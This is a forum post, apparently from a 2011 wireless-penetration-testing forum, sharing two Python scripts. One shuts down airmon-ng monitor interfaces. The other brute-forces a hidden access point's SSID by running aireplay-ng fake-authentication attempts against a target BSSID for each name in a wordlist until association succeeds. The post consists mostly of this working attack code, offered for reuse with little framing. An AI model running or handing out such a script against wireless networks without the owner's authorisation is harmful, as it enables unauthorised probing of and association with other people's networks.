Results 1 to 9 of 9

Thread: Useful python scripts - Brute hidden SSID

Threaded View

  1. #1
    Senior Member
    Join Date
    May 2010
    Posts
    198

    Default Useful python scripts - Brute hidden SSID

    I only wrote one of these scripts but did add airmon-ng support to the one I didn't.

    The hidden SSID brute force attack is demonstrated in the video below as part of a broader framework.

    Skip ahead to 2:44 for the hidden SSID demo.
    Sorry there is no awesome music to jam out to.
    http://vimeo.com/31786626 Comments on video will be appreciated

    The script parts (not the frameword) are below... (I just started messing around with Python so this is an experiment)

    Might be useful to someone
    Kill all monitor interfaces
    Code:
    #!/usr/bin/python
    
    import subprocess
    import sys, binascii, re
    from subprocess import Popen, PIPE
    
    # read the file /proc/net/dev
    f = open('/proc/net/dev','r')
    
    # write to list
    ifacelist = f.read().split('\n') 
    
    # close the file
    f.close()
    
    # remove first 2 lines
    ifacelist.pop(0)
    ifacelist.pop(0)
    
    for line in ifacelist:
    
        ifacedata = line.replace(' ','').split(':')
    
        # narrow down selection
        if len(ifacedata) == 2:
    
            # verify interface is up
            if int(ifacedata[1]) > 0:
    
                # find iface (add list function)
                string = ifacedata[0]
                if string in ('mon0', 'mon1', 'mon2', 'mon3', 'mon4', 'ath0', 'ath1'):
    	      print '\nmonitor interface found - Putting it down'
    	      for temp in ifacedata:
    		subprocess.call(["airmon-ng", "stop", temp])
    brute hidden ssid script
    Code:
    #!/usr/bin/python
    
    
    # script created by Tony 'albatr0ss' Di Bernardo, October 2011
    # you are free to re-use the code as long as you give credit to the author in you works
    
    import subprocess
    import sys, binascii, re
    from subprocess import Popen, PIPE
    
    class bcolors:
        HEADER = '\033[95m'
        OKBLUE = '\033[94m'
        OKGREEN = '\033[92m'
        WARNING = '\033[93m'
        FAIL = '\033[91m'
        ENDC = '\033[0m'
    
        def disable(self):
            self.HEADER = ''
            self.OKBLUE = ''
            self.OKGREEN = ''
            self.WARNING = ''
            self.FAIL = ''
            self.ENDC = ''
    
    if (len(sys.argv) < 3):
    	print 'Usage: ' + sys.argv[0] + ' bssid essid_list channel interface'
    	sys.exit(-1)
    
    bssid = sys.argv[1]
    essid_list = sys.argv[2]
    channel = sys.argv[3]
    interface = sys.argv[4]
    
    
    subprocess.call(["airmon-ng", "start", interface, channel])
    
    print 'Searching name for Access Point ' + bssid + ' using file ' + essid_list
    
    f = open(essid_list, 'r')
    
    for temp in f:
    	essid =  re.sub(r'\W+','', temp)
    	print 'Trying Essid: ' + essid
    	c = Popen(['aireplay-ng', '--fakeauth', '0', '-T 1','-a',  bssid, '-e', essid, 'mon0'], stdout=PIPE)
    	output = c.stdout.read()
    	
    	finalresult = output.split('\n')[6]
    
    	if finalresult.find('Association successful') != -1 :
    		print bcolors.WARNING +  '\nFound! Access Point ' + bssid + ' Essid is ' + essid + bcolors.ENDC
    		subprocess.call(["airmon-ng", "stop", "mon0",])
    		sys.exit(0)
    
    print bcolors.FAIL + '\nEssid not in file ' + essid_list + ' for Access Point ' + bssid + bcolors.ENDC
    Last edited by Scamentology; 11-09-2011 at 08:25 AM.
    "Never do anything against conscience -- even if the state demands it."
    -- Albert Einstein

Similar Threads

  1. Worth of hidden SSID?
    By george8 in forum Beginners Forum
    Replies: 11
    Last Post: 12-09-2010, 01:09 AM
  2. hidden scripts
    By bbakker in forum Beginners Forum
    Replies: 6
    Last Post: 02-08-2010, 02:22 PM
  3. WPA and SSID hidden
    By ferretrj in forum OLD BackTrack 4 (pre) Final
    Replies: 11
    Last Post: 12-31-2009, 03:13 AM
  4. Hidden SSID ???
    By dark_magician in forum OLD BackTrack 4 General Support
    Replies: 6
    Last Post: 09-05-2009, 08:29 PM
  5. Discover a hidden ssid
    By Sir_Smoke in forum OLD BackTrack v2.0 Final
    Replies: 8
    Last Post: 09-06-2007, 09:41 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •